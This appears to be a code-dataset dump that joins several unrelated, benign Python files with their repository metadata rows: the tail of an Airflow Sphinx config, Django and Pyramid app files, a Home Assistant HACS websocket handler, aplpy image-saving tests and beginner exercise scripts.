'howto/operator/gcp/_partials',
]
# The reST default role (used for this markup: `text`) to use for all
# documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
keep_warnings = True
intersphinx_mapping = {
'boto3': ('https://boto3.amazonaws.com/v1/documentation/api/latest/', None),
'google-cloud-python': (
'https://googleapis.github.io/google-cloud-python/latest/', None),
'mongodb': ('https://api.mongodb.com/python/current/', None),
'pandas': ('https://pandas.pydata.org/pandas-docs/stable/', None),
'python': ('https://docs.python.org/3/', None),
'requests': ('http://docs.python-requests.org/en/master/', None),
'sqlalchemy': ('https://docs.sqlalchemy.org/en/latest/', None),
}
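# With the mapping above, cross-references in docstrings can resolve against
# those external projects' inventories. A hedged illustration -- the function
# below is invented purely for this example and is not part of the config:
def _intersphinx_example(path):
    """Read ``path`` into a :class:`pandas.DataFrame`.

    The ``:class:`` role here is resolved through the external pandas
    inventory registered in ``intersphinx_mapping``.
    """
    raise NotImplementedError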
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
import sphinx_rtd_theme
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
html_title = "Airflow Documentation"
# A shorter title for the navigation bar. Default is the same as html_title.
html_short_title = ""
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
# html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
# html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
# html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_domain_indices = True
# If false, no index is generated.
html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
html_show_copyright = False
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'Airflowdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
# 'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'Airflow.tex', u'Airflow Documentation',
u'Apache Airflow', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# If true, show page references after internal links.
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'airflow', u'Airflow Documentation',
[u'Apache Airflow'], 1)
]
# If true, show URL addresses after external links.
# man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [(
'index', 'Airflow', u'Airflow Documentation',
u'Apache Airflow', 'Airflow',
    'Airflow is a system to programmatically author, schedule and monitor data pipelines.',
'Miscellaneous'
), ]
# Documents to append as an appendix to all manuals.
# texinfo_appendices = []
# If false, no module index is generated.
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
# texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
# texinfo_no_detailmenu = False
# sphinx-autoapi configuration
# See:
# https://sphinx-autoapi.readthedocs.io/en/latest/config.html
# Paths (relative or absolute) to the source code that you wish to generate
# your API documentation from.
autoapi_dirs = [
os.path.abspath('../airflow'),
]
# A directory that has user-defined templates to override our default templates.
autoapi_template_dir = 'autoapi_templates'
# A list of patterns to ignore when finding files
autoapi_ignore = [
# These modules are backcompat shims, don't build docs for them
'*/airflow/contrib/operators/s3_to_gcs_transfer_operator.py',
'*/airflow/contrib/operators/gcs_to_gcs_transfer_operator.py',
'*/node_modules/*',
'*/migrations/*',
]
# Keep the AutoAPI generated files on the filesystem after the run.
# Useful for debugging.
autoapi_keep_files = False
# Relative path to output the AutoAPI files into. This can also be used to place the generated documentation
# anywhere in your documentation hierarchy.
autoapi_root = '_api'
# -- Options for example include ------------------------------------------
exampleinclude_sourceroot = os.path.abspath('..')
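# A rough way to exercise this configuration locally (hedged: the source and
# output directories below are assumptions about the checkout layout, not
# something this file defines):
#
#     sphinx-build -b html . _build/html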
| 30.599548
| 108
| 0.699963
|
c10a87b161c6a0af9997d7c6ff9382a2b9b90439
| 176
|
py
|
Python
|
Python/file.py
|
streamer-AP/HRT19D-detection
|
8d7f2447d1ce9e8dc4f2b66162e2972f42c0298f
|
[
"Apache-2.0"
] | 24
|
2018-12-09T07:38:59.000Z
|
2021-03-08T10:47:12.000Z
|
Python/file.py
|
streamer-AP/HRT19D-detection
|
8d7f2447d1ce9e8dc4f2b66162e2972f42c0298f
|
[
"Apache-2.0"
] | null | null | null |
Python/file.py
|
streamer-AP/HRT19D-detection
|
8d7f2447d1ce9e8dc4f2b66162e2972f42c0298f
|
[
"Apache-2.0"
] | 4
|
2019-01-07T06:03:10.000Z
|
2019-01-17T02:53:02.000Z
|
with open("testfile.txt","w") as file_object:
file_object.writelines(["hello\r","HRTER"])
with open("testfile.txt","r") as file_object:
print(file_object.readlines())
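# Worth noting for the snippet above: writelines() does not add line
# separators itself, and the "\r" is translated by universal newlines when the
# file is read back. A self-contained sketch of the usual pattern (the file
# name is illustrative):
lines = ["alpha", "beta"]
with open("demo_lines.txt", "w") as demo_file:
    demo_file.writelines(line + "\n" for line in lines)  # add newlines explicitly
with open("demo_lines.txt", "r") as demo_file:
    print(demo_file.readlines())  # ['alpha\n', 'beta\n']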
| 29.333333
| 47
| 0.698864
|
291f8a78955e9e4563e91844eadcad4524ad3ea6
| 87
|
py
|
Python
|
ozone-framework-python-server/legacy/apps.py
|
aamduka/ozone
|
3fdbf232f5ea70661204a632e45310ca9d374973
|
[
"Apache-2.0"
] | 6
|
2020-02-21T22:06:31.000Z
|
2020-12-08T10:48:07.000Z
|
ozone-framework-python-server/legacy/apps.py
|
aamduka/ozone
|
3fdbf232f5ea70661204a632e45310ca9d374973
|
[
"Apache-2.0"
] | 12
|
2019-12-26T17:38:40.000Z
|
2022-02-10T14:15:55.000Z
|
legacy/apps.py
|
tiagocordeiro/estudio-sie
|
96ba0024145d1f9e0ec7a3cbdd11e555674b23a3
|
[
"MIT"
] | 4
|
2019-09-20T01:20:33.000Z
|
2020-09-05T01:15:51.000Z
|
from django.apps import AppConfig
class LegacyConfig(AppConfig):
name = 'legacy'
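# Hedged usage note: the app config above only takes effect once it is listed
# in the project settings; a typical (illustrative) entry would be:
#
#     INSTALLED_APPS = [
#         # ...
#         'legacy.apps.LegacyConfig',
#     ]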
| 14.5
| 33
| 0.747126
|
d4d79f5d9bb219df38fd95f6884eed2f4452b873
| 2,880
|
py
|
Python
|
casa.CONFIG/frenck-config/custom_components/hacs/api/hacs_repositories.py
|
janiversen/ha_config
|
98d7d4eed3a136220133724a044b9358896efbb7
|
[
"Apache-2.0"
] | 1,383
|
2018-06-23T20:16:57.000Z
|
2022-03-30T09:10:06.000Z
|
config/custom_components/hacs/api/hacs_repositories.py
|
jclark2019/home-assistant-config
|
a1354a8889e12b961fd16f4800c452b4fd0124f0
|
[
"MIT"
] | 60
|
2018-12-14T10:11:34.000Z
|
2021-11-06T18:43:19.000Z
|
config/custom_components/hacs/api/hacs_repositories.py
|
jclark2019/home-assistant-config
|
a1354a8889e12b961fd16f4800c452b4fd0124f0
|
[
"MIT"
] | 270
|
2018-12-17T05:54:10.000Z
|
2022-03-23T20:28:54.000Z
|
"""API Handler for hacs_repositories"""
from homeassistant.components import websocket_api
import voluptuous as vol
from custom_components.hacs.share import get_hacs
@websocket_api.async_response
@websocket_api.websocket_command({vol.Required("type"): "hacs/repositories"})
async def hacs_repositories(_hass, connection, msg):
"""Handle get media player cover command."""
hacs = get_hacs()
repositories = hacs.repositories
content = []
for repo in repositories:
if (
repo.data.category in hacs.common.categories
and not repo.ignored_by_country_configuration
):
data = {
"additional_info": repo.information.additional_info,
"authors": repo.data.authors,
"available_version": repo.display_available_version,
"beta": repo.data.show_beta,
"can_install": repo.can_install,
"category": repo.data.category,
"country": repo.data.country,
"config_flow": repo.data.config_flow,
"custom": repo.custom,
"default_branch": repo.data.default_branch,
"description": repo.data.description,
"domain": repo.data.domain,
"downloads": repo.data.downloads,
"file_name": repo.data.file_name,
"first_install": repo.status.first_install,
"full_name": repo.data.full_name,
"hide": repo.data.hide,
"hide_default_branch": repo.data.hide_default_branch,
"homeassistant": repo.data.homeassistant,
"id": repo.data.id,
"info": repo.information.info,
"installed_version": repo.display_installed_version,
"installed": repo.data.installed,
"issues": repo.data.open_issues,
"javascript_type": repo.information.javascript_type,
"last_updated": repo.data.last_updated,
"local_path": repo.content.path.local,
"main_action": repo.main_action,
"name": repo.display_name,
"new": repo.data.new,
"pending_upgrade": repo.pending_upgrade,
"releases": repo.data.published_tags,
"selected_tag": repo.data.selected_tag,
"stars": repo.data.stargazers_count,
"state": repo.state,
"status_description": repo.display_status_description,
"status": repo.display_status,
"topics": repo.data.topics,
"updated_info": repo.status.updated_info,
"version_or_commit": repo.display_version_or_commit,
}
content.append(data)
connection.send_message(websocket_api.result_message(msg["id"], content))
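# For reference, the command schema above only requires a "type" key; the "id"
# is supplied by the websocket layer and echoed back via result_message. A
# request message therefore looks roughly like this (illustrative values):
EXAMPLE_REQUEST = {"id": 42, "type": "hacs/repositories"}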
| 43.636364
| 77
| 0.588194
|
18f5c8b77e97b05821787e44f30da7ac7fe6a142
| 3,013
|
py
|
Python
|
test.py
|
G00364756/PythonExamples
|
3db5ba6fd333552cc924bfc779381354b6239ae3
|
[
"Apache-2.0"
] | null | null | null |
test.py
|
G00364756/PythonExamples
|
3db5ba6fd333552cc924bfc779381354b6239ae3
|
[
"Apache-2.0"
] | null | null | null |
test.py
|
G00364756/PythonExamples
|
3db5ba6fd333552cc924bfc779381354b6239ae3
|
[
"Apache-2.0"
] | null | null | null |
#def ask_ok(prompt, retries=4, reminder='Please try again!'):
#while True:
#ok = input(prompt)
#if ok in ('y', 'ye', 'yes'):
#return True
#if ok in ('n', 'no', 'nop', 'nope'):
#return False
#retries = retries - 1
#if retries < 0:
#raise ValueError('invalid user response')
#print(reminder)
#ask_ok("overwrite file?")
#-------------------------------------------------------------------------------
#s = 9
#x = str(s)
#z = x[::-1]
#print(z)
#--------------------------------------------------------------------------------
#Alps = range(1,5,1)
#Rockies = range(1,5,1)
#for a,b in zip(Alps,Rockies):
#p = a*b
#newRange = [p]
#print(newRange)
#----------------------------------------------------------------------------------
#def isPalin(n):
# """Function tests whether a number is a palindrome or not"""
# z = str(n) # creates a string from number,integer,etc.
# s = z[::-1] # this reverses the order of the string
# if z == s:
# return "True"
# else:
# return "False"
#-----------------------------------------------------------------------------
#def isPalarray(x):
# """Function returns a list of palindromes"""
# palindromes = []
# while x < 100: # this loop adds palindromes to the list if it is one
# if isPalin(x) == "True": # see isPalin definition
# palindromes.append(x)
# x = x + 1
# elif isPalin(x) == "False":
# x = x + 1
# return(palindromes)
#def iterate(t):
# """Function iterate i and then j"""
# myRange = []
# q = 1000 # limits the range for a
# r = 1000 # limit the range for b
# for b in range (899,q,1):
# for a in range(899,r,1):
# p = a*b
# myRange.append(p) # adds p to the range "myRange"
# myRange.sort() # sorts the range
# v = []
# for l in myRange:
# if l not in v: # creates a new list that takes away all the duplicates from the original list
# v.append(l)
# return (v)
#y = 1
#ans = iterate(y)
#print(ans)
#x = 1
#u = isPalarray(x)
#print(u)
#------------------------------------------------------------------------------------------
#Range1 = []
#i = 3
#while i < 100:
# i = i + 2
# Range1.append(i)
#Range2 = []
#x = 2
#y = 1
#j = 2*(x*y)
#while j < 100:
# Range2.append(j)
# x = x + 1
# y = y + 1
# j = 2*(x*y)
#---------------------------------------------------------------------------------
#n = 20
#Alps = []
#while n != 0:
# for b in range (1,21,1):
# if n % b == 0:
# print(n)
# break
# else:
# n = n + 20
cubes = [0, 1, 2, 3, 4]
letters = cubes  # aliasing: ``letters`` and ``cubes`` name the same list object
print(letters)
hi = []
pp = []
def splits(name):
    # ``==`` compares by value; since ``hi`` and ``pp`` are both empty lists,
    # any empty list matches the first branch and returns "hi".
    if name == hi:
        return "hi"
    elif name == pp:
        return "heya!"
    else:
        pass
print(splits(pp))  # prints "hi", because pp == hi evaluates to True
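# A short, self-contained aside on the two behaviours above (names are
# illustrative):
a = [0, 1, 2]
b = a              # aliasing: both names refer to the same list object
b.append(3)
print(a)           # [0, 1, 2, 3] -- the change made via b is visible through a
x, y = [], []
print(x == y)      # True:  equal by value (both are empty lists)
print(x is y)      # False: they are two distinct objects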
| 25.533898
| 103
| 0.404248
|
b32fac236c21e688ffe22a489ee1b1ec7a5f0555
| 327
|
py
|
Python
|
jobs/models.py
|
pauljeffrey/portfolio
|
ff91ab2a6e30886f0a686aae56fe2df45e497fbd
|
[
"MIT"
] | 3
|
2019-06-23T11:35:15.000Z
|
2022-03-28T15:39:23.000Z
|
jobs/models.py
|
pauljeffrey/portfolio
|
ff91ab2a6e30886f0a686aae56fe2df45e497fbd
|
[
"MIT"
] | 2
|
2019-01-30T21:00:41.000Z
|
2020-03-06T00:15:20.000Z
|
jobs/models.py
|
pauljeffrey/portfolio
|
ff91ab2a6e30886f0a686aae56fe2df45e497fbd
|
[
"MIT"
] | 3
|
2019-03-19T06:18:43.000Z
|
2021-06-23T16:30:51.000Z
|
from django.db import models
from django.urls import reverse
# Create your models here.
class Jobs(models.Model):
image = models.ImageField(upload_to="images/")
upload_date = models.DateTimeField(auto_now_add=True)
def get_absolute_url(self):
return reverse('home', args=[str(self.id)])
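# Hedged sketch: reverse('home', ...) above resolves only if some URLconf
# defines a pattern named 'home' that accepts one argument; the view and
# module names below are hypothetical:
#
#     from django.urls import path
#     from . import views
#
#     urlpatterns = [
#         path('<int:id>/', views.home, name='home'),
#     ]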
| 19.235294
| 57
| 0.691131
|
ed1f71449a9d2cac3c00fc2cde725e0afa739990
| 2,816
|
py
|
Python
|
aplpy/tests/test_save.py
|
GiantMolecularCloud/aplpy
|
352fdd7fc776ebcb9058451e0b3aced777083257
|
[
"MIT"
] | null | null | null |
aplpy/tests/test_save.py
|
GiantMolecularCloud/aplpy
|
352fdd7fc776ebcb9058451e0b3aced777083257
|
[
"MIT"
] | null | null | null |
aplpy/tests/test_save.py
|
GiantMolecularCloud/aplpy
|
352fdd7fc776ebcb9058451e0b3aced777083257
|
[
"MIT"
] | null | null | null |
from __future__ import absolute_import, print_function, division
import os
import sys
from io import BytesIO as StringIO
import pytest
import numpy as np
from .. import FITSFigure
FORMATS = [None, 'png', 'pdf', 'eps', 'ps', 'svg']
ARRAY = np.arange(256).reshape((16, 16))
def is_format(filename, format):
if isinstance(filename, str):
f = open(filename, 'rb')
else:
f = filename
if format == 'png':
return f.read(8) == b'\x89\x50\x4e\x47\x0d\x0a\x1a\x0a'
elif format == 'pdf':
return f.read(4) == b'\x25\x50\x44\x46'
elif format == 'eps':
return f.read(23) == b'%!PS-Adobe-3.0 EPSF-3.0'
elif format == 'ps':
return f.read(14) == b'%!PS-Adobe-3.0'
elif format == 'svg':
from xml.dom import minidom
return minidom.parse(f).childNodes[2].attributes['xmlns'].value == 'http://www.w3.org/2000/svg'
else:
raise Exception("Unknown format: %s" % format)
@pytest.mark.parametrize(('format'), FORMATS)
def test_write_png(tmpdir, format):
filename = os.path.join(str(tmpdir), 'test_output.png')
f = FITSFigure(ARRAY)
f.show_grayscale()
try:
f.save(filename, format=format)
except TypeError:
pytest.xfail()
finally:
f.close()
if format is None:
assert is_format(filename, 'png')
else:
assert is_format(filename, format)
@pytest.mark.parametrize(('format'), FORMATS)
def test_write_pdf(tmpdir, format):
filename = os.path.join(str(tmpdir), 'test_output.pdf')
f = FITSFigure(ARRAY)
f.show_grayscale()
try:
f.save(filename, format=format)
except TypeError:
pytest.xfail()
finally:
f.close()
if format is None:
assert is_format(filename, 'pdf')
else:
assert is_format(filename, format)
@pytest.mark.parametrize(('format'), FORMATS)
def test_write_eps(tmpdir, format):
filename = os.path.join(str(tmpdir), 'test_output.eps')
f = FITSFigure(ARRAY)
f.show_grayscale()
try:
f.save(filename, format=format)
except TypeError:
pytest.xfail()
finally:
f.close()
if format is None:
assert is_format(filename, 'eps')
else:
assert is_format(filename, format)
@pytest.mark.parametrize(('format'), FORMATS)
def test_write_stringio(tmpdir, format):
s = StringIO()
f = FITSFigure(ARRAY)
f.show_grayscale()
try:
f.save(s, format=format)
except TypeError:
pytest.xfail()
finally:
f.close()
try:
s.seek(0)
except ValueError:
if format == 'svg' and sys.version_info[:2] >= (3, 3):
pytest.xfail()
else:
raise
if format is None:
assert is_format(s, 'png')
else:
assert is_format(s, format)
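# A small usage sketch for is_format() above: write the 8-byte PNG signature
# to a temporary file and check that it is recognised (test name and padding
# bytes are illustrative).
def test_is_format_png_signature(tmpdir):
    path = os.path.join(str(tmpdir), 'sig.png')
    with open(path, 'wb') as fh:
        fh.write(b'\x89\x50\x4e\x47\x0d\x0a\x1a\x0a' + b'\x00' * 8)
    assert is_format(path, 'png')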
| 25.6
| 103
| 0.608665
|
ccfac7062c4a14e4920d04d1f4209ce439e4871b
| 210
|
py
|
Python
|
h/api/__init__.py
|
gnott/h
|
77a0452b8196f7efb97d4a400ce7583062d620e6
|
[
"MIT"
] | null | null | null |
h/api/__init__.py
|
gnott/h
|
77a0452b8196f7efb97d4a400ce7583062d620e6
|
[
"MIT"
] | null | null | null |
h/api/__init__.py
|
gnott/h
|
77a0452b8196f7efb97d4a400ce7583062d620e6
|
[
"MIT"
] | null | null | null |
def includeme(config):
"""Include the annotator-store API."""
# Order matters here, in case the token and store routes share a prefix
config.include('h.api.token')
config.include('h.api.store')
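# Hedged sketch of how a Pyramid application might wire this in; the settings
# plumbing below is illustrative, not taken from this project:
def _example_main(global_config, **settings):
    from pyramid.config import Configurator
    config = Configurator(settings=settings)
    config.include('h.api')  # runs includeme() above
    return config.make_wsgi_app()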
| 35
| 75
| 0.690476
|
9e55c5f210eef6f11748c19e6aa470195a797ea7
| 624
|
py
|
Python
|
manage.py
|
idesu/yet-another-blog-engine
|
99cd2d775577126b08174d9ee3e2e38a22b8d7af
|
[
"BSD-3-Clause"
] | null | null | null |
manage.py
|
idesu/yet-another-blog-engine
|
99cd2d775577126b08174d9ee3e2e38a22b8d7af
|
[
"BSD-3-Clause"
] | 8
|
2021-04-08T21:26:26.000Z
|
2022-03-12T00:18:06.000Z
|
manage.py
|
idesu/yet-another-blog-engine
|
99cd2d775577126b08174d9ee3e2e38a22b8d7af
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'yabe.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| 28.363636
| 73
| 0.68109
|